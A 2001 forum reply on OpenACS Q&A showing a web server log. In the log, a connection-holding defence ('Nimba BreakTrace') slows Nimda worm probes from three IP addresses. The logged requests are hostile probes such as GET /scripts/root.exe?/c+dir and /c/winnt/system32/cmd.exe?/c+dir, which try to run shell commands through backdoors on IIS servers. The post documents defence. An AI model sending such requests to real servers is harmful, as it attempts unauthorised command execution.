Forum OpenACS Q&A: Response to How to bypass rp_filter: Nimba Worm

Collapse
6: Response to How to bypass rp_filter: Nimba Worm (response to 1)
Posted by Tom Jackson on 09/19/01 05:53 AM
The log below demonstrates that holding the attacker definitely slows
them down. Here three separate attackers slowly make their way through
their program:

[18/Sep/2001:19:42:19][4946.9226][-conn0-] Notice: 216.102.228.12 GET /scripts/root.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:42:21][4946.8201][-sched:11-] Notice: Starting jconn mailto:weblog@pathfinderschool.com/ws
[18/Sep/2001:19:42:21][4946.8201][-sched:11-] Notice: Conn is jabber1 and xmlnode is xode1
[18/Sep/2001:19:42:21][4946.3076][jabpool.1] Notice: In thread 1000867341 :: [139961317]
[18/Sep/2001:19:43:19][4946.9226][-conn0-] Notice: Nimba BreakTrace holding: 0 total: 1 released ip: 216.102.228.12
[18/Sep/2001:19:43:21][4946.9226][-conn0-] Notice: 216.43.28.103 GET /scripts/root.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:43:21][4946.10251][-conn1-] Notice: 216.102.228.12 GET /MSADC/root.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:44:21][4946.9226][-conn0-] Notice: Nimba BreakTrace holding: 1 total: 3 released ip: 216.43.28.103
[18/Sep/2001:19:44:21][4946.10251][-conn1-] Notice: Nimba BreakTrace holding: 0 total: 3 released ip: 216.102.228.12
[18/Sep/2001:19:44:24][4946.9226][-conn0-] Notice: 216.43.28.103 GET /MSADC/root.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:44:26][4946.10251][-conn1-] Notice: 216.102.228.12 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:45:24][4946.9226][-conn0-] Notice: Nimba BreakTrace holding: 1 total: 5 released ip: 216.43.28.103
[18/Sep/2001:19:45:25][4946.9226][-conn0-] Notice: 216.43.28.103 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:45:26][4946.10251][-conn1-] Notice: Nimba BreakTrace holding: 1 total: 6 released ip: 216.102.228.12
[18/Sep/2001:19:45:28][4946.10251][-conn1-] Notice: 216.102.228.12 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:46:25][4946.9226][-conn0-] Notice: Nimba BreakTrace holding: 1 total: 7 released ip: 216.43.28.103
[18/Sep/2001:19:46:28][4946.10251][-conn1-] Notice: Nimba BreakTrace holding: 0 total: 7 released ip: 216.102.228.12
[18/Sep/2001:19:46:34][4946.9226][-conn0-] Notice: 216.43.28.103 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:47:14][4946.10251][-conn1-] Notice: 216.70.28.5 GET /scripts/root.exe?/c+dir HTTP/1.0
[18/Sep/2001:19:47:34][4946.9226][-conn0-] Notice: Nimba BreakTrace holding: 1 total: 9 released ip: 216.43.28.103
[18/Sep/2001:19:48:14][4946.10251][-conn1-] Notice: Nimba BreakTrace holding: 0 total: 9 released ip: 216.70.28.5
[18/Sep/2001:19:48:17][4946.9226][-conn0-] Notice: 216.70.28.5 GET /MSADC/root.exe?/c+dir HTTP/1.0